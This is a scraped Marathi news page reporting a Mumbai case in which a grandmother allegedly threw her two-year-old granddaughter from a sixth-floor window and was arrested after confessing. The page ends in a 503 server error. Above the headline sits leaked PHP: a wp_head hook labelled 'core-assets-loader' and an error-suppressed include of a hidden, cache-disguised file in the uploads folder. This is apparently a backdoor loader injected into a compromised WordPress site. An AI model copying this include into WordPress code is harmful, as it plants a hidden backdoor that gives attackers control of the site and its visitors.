add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आजीनं दोन वर्षाच्या नातीला सहाव्या मजल्यावरून फेकलं – SOCH INDIA
Menu

अपराध समाचार
आजीनं दोन वर्षाच्या नातीला सहाव्या मजल्यावरून फेकलं

nobanner

निर्दयीपणाचा कळस गाठणारी घटना मालाड पूर्व भागात घडली आहे. वारंवार दुसऱ्या नातवाशी भांडते म्हणून आजीने दोन वर्षाच्या नातीलाच सहाव्या मजल्यावरून फेकल्याची धक्कादायक घटना समोर आली आहे. याप्रकरणी पोलिसांनी आजीला अटक केली असून, रूकसाना अन्सारी (वय ५०) असे आरोपी महिलेचे नाव आहे.

मालाड पूर्व परिसरात दोन वर्षांच्या चिमुकलीचा सहाव्या मजल्यावरून पडून मृत्यु झाल्याची घटना शनिवारी घडली होती. या प्रकरणात पोलिसांनी तपास केल्यानंतर आजीनं नातीला संपवल्याची माहिती समोर आली. याबाबत पोलिसांनी सांगितले की, “इजाज उबेदुल्ला अन्सारी यांचे कुटुंब काही दिवसांपूर्वी कुरार येथे राहण्यास आले होते. या ठिकाणी रुकसाना, तिचा पती, मुलगी, नातू यांच्यासह इजाज त्याची पत्नी आणि मुलगी जिया हे एकत्र राहत होते. शनिवारी पहाटे ५.३० ते ५.४५ या वेळेत जिया इमारतीखाली पडलेली काही नागरिकांनी पाहिले. ती मृतप्राय अवस्थेत पडलेली होती. त्यानंतर तिच्या कुटुंबियांनी तिला उपचारासाठी रुग्णालयात दाखल केले. डॉक्टरांनी जिया हिला मृत घोषित केले आणि उंचावरून पडल्याने तिचा मृत्यू झाल्याचे अहवालातून स्प्ष्ट झाले,” असे पोलिसांनी सांगितले.

दरम्यान, जियाचा मृतदेह ज्या अवस्थेत आढळला त्यावरून ती पडली नसल्याचा पोलिसांना संशय आला. “जियाचा मृतदेह ज्या अवस्थेत आढळून आला, त्यावरून तिला फेकण्यात आल्याचं दिसून येत होतं,” असं कुरार पोलिसांनी सांगितलं. घरातील कुणीतरी केल्याचा पोलिसांचा संशय बळावला. त्यानंतर पोलिसांनी कुटुंबातील व्यक्तींची चौकशी केली. त्यातून जियाची आजी रुकसाना अन्सारी यांनीच तिला खिडकीतून फेकल्याची माहिती समोर आली. खेळण्यावरून दोन्ही नातवंडांमध्ये भांडणे होत. प्रत्येकवेळी रुकसाना नातवाची बाजू घेई आणि जिया हिला मारहाण करायची. यावरून ती जियाच्या वडिलांशी भांडण करून दुसऱ्या मुलाकडे राहण्यास गेली होती. काही दिवसांनी परत आल्यानंतरही तिचा जियाविषयीचा राग कमी झालेला नव्हता. प्राथमिक चौकशीत ही माहिती मिळाल्यानंतर पोलिसांनी रुकसाना हिची कसून चौकशी केली. सुरुवातीला टाळाटाळ करणाऱ्या रुकसाना हिने नंतर हत्येची कबुली दिली, अशी माहिती कुरार पोलीस ठाण्याचे सहाय्यक पोलीस निरीक्षक जी. एस. घर्गे यांनी दिली.

शुक्रवारी रात्री जियाची प्रकृती बरी नव्हती. त्यामुळे ती सारखी रडत होती. तिच्यामुळे संपूर्ण कुटुंब रात्री तीन वाजेपर्यंत जागे होते. त्यानंतर शनिवारी सकाळी जियाची आजी रूकसाना अन्सारी उठली आणि तिने झोपे असलेल्या जियाला खिडकीतून बाहेर फेकून दिले. यावेळी सगळं कुटुंब झोपेत होते, घर्गे म्हणाले. याप्रकरणी आरोपी महिलेला पोलिसांनी अटक केली आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.